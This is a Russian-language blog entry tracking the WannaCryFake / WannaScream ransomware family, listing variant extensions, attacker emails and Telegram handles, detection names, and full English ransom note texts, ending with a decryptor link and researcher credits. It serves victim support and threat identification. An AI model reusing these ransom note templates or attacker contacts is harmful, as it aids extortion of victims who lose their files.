Пример зашифрованного файла: Photo_001.jpg.[BFEBFBFF000906EA][recoverydata52@protonmail.com].Snc
Email: recoverydata52@protonmail.com
Telegram: @book545
Записка: ReadMe.txt

➤ Содержание записки о выкупе:
Your All Files Encrypted With High level Cryptography Algorithm
If You Need Your Files You Should Pay For Decryption
You Can Send 1MB File For Decryption Test To Make Sure Your Files Can Be Decrypted 
After 48 hour If You Dont contact us or use 3rd party applications or recovery tools   Decryption fee will Be Double
After Test You Will Get Decryption Tool 
Send This Code In Email : BFEBFBFF000906E9
Contact Us Via Email: recoverydata54@protonmail.com
Contact Us Via Telegram: @book545

---

Перевод записки на русский язык:
Все ваши файлы зашифрованы с алгоритмом криптографии высокого уровня
Если вам нужны ваши файлы, вы должны заплатить за расшифровку
Вы можете отправить файл 1MB для тест-расшифровки, чтобы убедиться, что ваши файлы могут быть расшифрованы
Через 48 часов, если вы не напишите нам или используете сторонние приложения или инструменты восстановления, плата за расшифровку будет удвоена
После теста вы получите инструмент расшифровки
Отправьте этот код по email: BFEBFBFF000906E9
Свяжитесь с нами по email: recoverydata54@protonmail.com
Свяжитесь с нами по Telegram: @book545


Обновление от 10 октября 2019:
Расширение: .Snc
Записка: ReadMe.txt

➤ Содержание записки о выкупе:
[+] Your All Files Encrypted With High level Cryptography Algorithm
[+] If You Need Your Files You Should Pay For Decryption
[+] You Can Send 1MB File For Decryption Test To Make Sure Your Files Can Be Decrypted 
[-] After 48 hour If You Dont contact us or use 3rd party applications or recovery tools,Decryption fee will Be Double
[+] After Test You Will Get Decryption Tool 
[+] Send This Code In Email : 1A19147C
[+] Contact Us Via Email: recovery94@protonmail.com

Обновление от 13 ноября 2019:
Пост на форуме >>
Расширение: .BlackRoot
Составное расширение (шаблон): .[<ID>].[encrypter@cock.li].BlackRoot
Записка: ReadMe.txt
Email: encrypter@cock.li
Оригинальное название и путь проекта: C:\Users\Pct\Desktop\BlackRoot (2)0\BlackRoot\BlackRoot\Banner\WpfApp1\obj\Release\BlackRouter.pdb
Файл: Runtime Broker.exe
Результаты анализов: VT + IA
---
➤ Обнаружения: 
DrWeb -> Trojan.Ransom.687
BitDefender -> Generic.Ransom.WCryG.8FC3BFBB
Avira (no cloud) -> TR/Ransom.sejzz
ESET-NOD32 -> A Variant Of MSIL/Filecoder.WannaCryFake.B
TrendMicro -> Ransom.MSIL.FILELOCK.SM


Обновление от 30 ноября 2019:
Топик на форуме >>
Расширение: .ccc
Составное расширение (шаблон): .[XXXXXXXX][encrypter@cock.li].ccc
Составное расширение (пример): .[E87042BE][encrypter@cock.li].ccc
Записка: ReadMe.txt
Записка: ReadMe.txt
Email: encrypter@cock.li, encrypter@keemail.me

➤ Содержание записки:
[+] All Your Files Have Been Encrypted [+]
 [-] Do You Really Want To Restore Your Files?
 [+] Write Us To The E-Mail : encrypter@cock.li
 [+] If you did not get any response until 24 hours later,Write to this E-Mail : encrypter@keemail.me
 [-] Write Your Unique-ID In The Title Of Your Message.
 [+] Unique-ID : E87042BE
 [-] You Have To Pay For Decryption In Bitcoins.
 [-] The Price Depends On How Fast You Write To Us.
 [-] After Payment We Will Send You The Decryption Tool
 That Will Decrypt All Your Files.
 _______________________________________________________
          [+] Free Decryption As Guarantee [+]
 [-] Before Paying You Can Send Us Up To 5 Files For
 Free Decryption, The Total Size Of Files Must Bee Less
 Than 10MB, (Non Archived) And Files Should Not Contain
 Valuable Information (Databases, Backups, Large Excel
 -Sheets, Etc).
 _______________________________________________________
             [+] How To Obtain Bitcoins [+]
 [-] The Easiest Way To Buy Bitcoins Is LocalBitcoins
 Site : https://localbitcoins.com/buy_bitcoins
 You Have To Register, Click 'Buy Bitcoins', And Select
 The Seller By Payment Method And Price.
 [-] Also You Can Find Other Places To Buy Bitcoins And
 Beginners Guide Here:
 http://coindesk.com/information/how-can-i-buy-bitcoins
 _______________________________________________________
                  [+] Attention! [+]
 [-] Do Not Rename Encrypted Files.
 [-] Do Not Try To Decrypt Your Data Using Third Party
 -Software, It May Cause Permanent Data Loss.
 [-] Decryption Of Your Files With The Help Of Third
 Parties May Cause Increased Price (They Add Their Fee
 To Our) Or You Can Become A Victim Of A Scam.
 _____________________ccc Ransomware_______________________



Обновление от 9 декабря 2019:
Пост в Твиттере >>
Самоназвание этого варианта: AWT ransomware
Расширение: .Snc
Составное расширение: .[1F8BFBFF000506E3][recoverydata52@protonmail.com].Snc
Email: recoverydata52@protonmail.com
Email: Fata54@cock.li, Fata52@cock.li
Записка: ReadMe.txt
Файлы: Key.txt, W.jpg, wallpaper.bmp

Файл: Runtime Broker.exe
Результаты анализов: VT + AR

➤ Содержание записки:
—=== Welcome Again =---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable.
You can check it: all files on you computer has expansion AWT
By the way, everything is possible to recover (restore), but you need to follow our
instructions, otherwise, you cant return your data (never).
[+] What guarantees? [+]
Its iust a business, we absolutely do not care about you and your deals, except getting benefits, if we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should send us Email, we decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.
[+] WHAT SHOULD I DO NOW ? [+]
IMPORTANT : Send this id in subject of you email : ***
1) [Recommended] You must email us
Email address : Fata54@cock.li
2)If you did not receive any response in 24 hours , contact us via second email address
second email address : Fata52@cock.li
-=== AWT ransomware ===—


Обновление от 2 января 2020:
Пост в Твиттере >>
Самоназвание этого варианта: AWT ransomware
Идентификация в "ID Ransomware" как AWT. 
Расширение: .AWT
Расширение (пример): .[***][getdataback22@protonmail.com].AWT
Расширение (шаблон): .[<id>][getdataback22@protonmail.com].AWT
Записка: ReadMe.txt
Новый вариант записки был заимствован из SpartCrypt Ransomware
Email: getdataback22@protonmail.com
Файл: Runtime Broker.exe
---
➤ Пост Майкла в Твиттере, подтверждающий родство вариантов >>
Ok, I took an in-depth look at all of the samples. They actually are all related. After deobfuscating, some of them were using different methods that made things look different before... The keygens are the only real difference between them all.
Перевод на русский:
OK, я подробно изучил все образцы. Они точно все связаны. После деобфускации некоторые из них используют разные методы, из-за которых результат выглядит иначе... Кейгены - единственное реальное различие между ними.

Обновление от 3 января 2020:
Пост в Твиттере >>
Самоназвание этого варианта: Snc ransomware
Расширение: .Snc
Расширение (пример): .[C4BA3647][recover13@protonmail.com].Snc
Расширение (шаблон): .[<id>][recover13@protonmail.com].Snc
Записка: ReadMe.txt
Новый вариант текстовой записки был заимствован из SpartCrypt Ransomware
Текст в записке теперь дублируется в экране блокировки, который заимствован у Zeropadypt-Ouroboros Ransomware. 
Email: recover13@protonmail.com, recoverdata13@protonmail.com
Telegram: @recover13
Файлы: Runtime Broker.exe, Ransomware Snc.exe
Результаты анализов: VT + HA + IA + AR
➤ Обнаружения:
DrWeb -> Trojan.Encoder.30486

BitDefender -> Gen:Variant.MSILPerseus.198553

Malwarebytes -> Ransom.FakeWannaCry.MSIL

ESET-NOD32 -> A Variant Of MSIL/Filecoder.WannaCryFace.B

➤ Содержание записки: 
       [+] All Your Files Have Been Encrypted [+]
 [-] Do You Really Want To Restore Your Files?
 [+] Write Us To The E-Mail : recover13@protonmail.com
 [+] If you did not get any response until 24 hours later,Write to this E-Mail : recoverdata13@protonmail.com
 [+] You can use Telegram to send message : @recover13
 [-] Write Your Unique-ID In The Title Of Your Message.
 [+] Unique-ID : C4BA3647
 [-] You Have To Pay For Decryption In Bitcoins.
 [-] The Price Depends On How Fast You Write To Us.
 [-] After Payment We Will Send You The Decryption Tool 
 That Will Decrypt All Your Files.
 _______________________________________________________
          [+] Free Decryption As Guarantee [+]
 [-] Before Paying You Can Send Us Up To 5 Files For 
 Free Decryption, The Total Size Of Files Must Bee Less
 Than 10MB, (Non Archived) And Files Should Not Contain
 Valuable Information (Databases, Backups, Large Excel
 -Sheets, Etc). 
 _______________________________________________________
             [+] How To Obtain Bitcoins [+]
 [-] The Easiest Way To Buy Bitcoins Is LocalBitcoins 
 Site : https://localbitcoins.com/buy_bitcoins 
 You Have To Register, Click 'Buy Bitcoins', And Select
 The Seller By Payment Method And Price.
 [-] Also You Can Find Other Places To Buy Bitcoins And
 Beginners Guide Here: 
 http://coindesk.com/information/how-can-i-buy-bitcoins 
 _______________________________________________________
                  [+] Attention! [+]
 [-] Do Not Rename Encrypted Files.
 [-] Do Not Try To Decrypt Your Data Using Third Party
 -Software, It May Cause Permanent Data Loss.
 [-] Decryption Of Your Files With The Help Of Third
 Parties May Cause Increased Price (They Add Their Fee
 To Our) Or You Can Become A Victim Of A Scam.
 _____________________Snc_Ransomware_______________________ 


Обновление от 8 января 2020:
Пост в Твиттере >>
Пост в Твитере >>
Самоназвание: DARKCRYPT Ransomware и Wanna Scream
Расширение: .WannaScream
Пример зашифрованного файла: Photo_001.jpg.[Filemgr@tutanota.com][XXXXXXXX].WannaScream
Email: Filemgr@tutanota.com, Cryptor6@tutanota.com
URL: xxxx://recoverydata.merehosting.com
Записка: README.txt, WannaScream.hta
Файл проекта: C:\Users\Pct\Desktop\Wanna Scream\Wanna Scream\Wanna Scream\Wanna Scream\Wanna Scream\obj\Release\Wanna Scream.pdb
Файл: Wanna Scream.exe
Результаты анализов: VT

➤ Обнаружения: 
DrWeb  -> Trojan.Encoder.30462
BitDefender  -> Generic.Ransom.WCryG.30A35D4E
Malwarebytes -> Ransom.DarkCrypt

Обновление от 20 января 2020:
Пост в Твиттере >>
Расширение: .harma
Пример зашифрованного файла: Photo_001.jpg.[<email>][XXXXXXXX].harma
Email: encryptor2020@protonmail.com, encryptorl996@protonmail.com
Записка: ReadMe.txt
HTTP-запросы: 
xxxx://icanhazip.com/ - определение IP
xxxx://recoverydata.merehosting.com/db
Атакующий: mehrdad
Файл: Runtime Broker.exe
Результаты анализов: VT

Обновление от 31 мая 2020:
Тема на форуме >>
Расширение: .FOB


Обновление от 23 августа 2020:
Расширение: .ADHUBLLKA
Топик на форуме >>
В данном случае WannaFaker взял у 'Gandcrab 5.1' текст записки, заголовок в тексте и код внизу записки. У так называемого 'ADHUBLLKA' он взял название записки, расширение и написал его в записке. Может быть еще что-то. Я не стал смотреть дальше и сравнивать. 
Записка: read_me.txt
Email: - 
Tor-URL: hxxx://alcx6zctcmhmn3kx.onion/?d756e65476c65746e49656e69e19129e530b312 

➤ Содержание записки: 
---=    GANDCRAB V5.1  =--- 
***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED***********************
*****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS*****
Attention! 
All your files, documents, photos, databases and other important files are encrypted and have the extension: .ADHUBLLKA
The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.
The server with your key is in a closed network TOR. You can get there by the following ways:
----------------------------------------------------------------------------------------
0. Download Tor browser - https://www.torproject.org/ 
1. Install Tor browser 
2. Open Tor Browser 
3. Open link in TOR browser:   http://alcx6zctcmhmn3kx.onion/?d756e65476c65746e49656e69e19129e530b312 
4. Follow the instructions on this page 
----------------------------------------------------------------------------------------
On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. 
ATTENTION!
IN ORDER TO PREVENT DATA DAMAGE:
* DO NOT MODIFY ENCRYPTED FILES
* DO NOT CHANGE DATA BELOW
---BEGIN GANDCRAB KEY---
***
---END GANDCRAB KEY---
---BEGIN PC DATA---
***
---END PC DATA---

Обновление от 1 сентября 2020: 

Идентификация в IDR: Wanna Scream

Расширение: .NORD

Составно ерасширение: .[12E53B0B[rescueme55@protonmail.com].NORD

Записки: info.hta, ReadMe.txt

Email: rescueme55@protonmail.com, nordrescue@protonmail.com

Telegram: @Book545

➤ Содержание txt-записки: 

 [+] All Your Files Have Been Encrypted [+]

 [-] Do You Really Want To Restore Your Files?

 [+] Write Us To The E-Mail : rescueme55@protonmail.com

 [+] Write Us To The ID-Telegram : @Book545

 [+] If you did not get any response until 24 hours later,Write to this E-Mail : nordrescue@protonmail.com

 [-] Write Your Unique-ID In The Title Of Your Message.

 [+] Unique-ID : 6E70A5FE

Обновление от 2 октября 2020: 

Идентификация в IDR: Wanna Scream

Расширение: .NORD

Составное расширение: .[88230CE8[nordunlock@protonmail.com].NORD

Записки: info.hta, ReadMe.txt

Email: nordunlock@protonmail.com, rescueme55@cock.li

Telegram: @Book545

➤ Содержание txt-записки: 

 [+] All Your Files Have Been Encrypted [+]

 [-] Do You Really Want To Restore Your Files?

 [+] Write Us To The E-Mail : nordunlock@protonmail.com

 [+] Write Us To The ID-Telegram : @Book545

 [+] If you did not get any response until 24 hours later,Write to this E-Mail : rescueme55@cock.li

 [-] Write Your Unique-ID In The Title Of Your Message.

 [+] Unique-ID : 88230CE8

Обновление от 26 октября 2020:

Сообщение >>

Идентификация в IDR: WannaScream

Расширение: .Bang

Составное расширение: .[XXXXXXXX[databang2020@protonmail.com].Bang

Расширение (шаблон): .[<id>[<email>].Bang

Записки: info.hta, ReadMe.txt

Результаты анализов: VT + IA

Обновление от 27 октября 2020:

Сообщение >>

Идентификация в IDR: WannaScream

Расширение: .H@RM@

Составное расширение: .[XXXXXXXX[recoverydata98@protonmail.com].H@RM@

Email: recoverydata98@protonmail.com, recoverydata99@protonmail.com

Записки: info.hta, ReadMe.txt

Результаты анализов: VT + IA

 

=== 2021 ===

Вариант от 19 сентября 2021: 

Самоназвание: Snc_Ransomware

Разработка на языке .NET

Сообщение >>

Расширение: .Cns

Полное расширение: .email=decryptharma24@cock.li.id=XXXXXXXX.Cns

Записки: ReadMe.txt, info.hta

Файл: File encryption.exe

Результаты анализов: VT + IA

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

Внимание!
Файлы в некоторых случаях можно расшифровать
Скачать Emsisoft Decryptor for WannaCryFake >>
*
Для более новых версий нужен другой дешифровщик. 

 Read to links: 
 Tweet on Twitter + Tweet + myTweet
 ID Ransomware (ID as WannaCryFake, AWT, WannaScream)
 Write-up, Topic of Support
 * 

 Thanks: 
 Michael Gillespie, GrujaRS
 Andrew Ivanov (author)
 ***
 to the victims who sent the samples
 

© Amigo-A (Andrew Ivanov): All blog articles.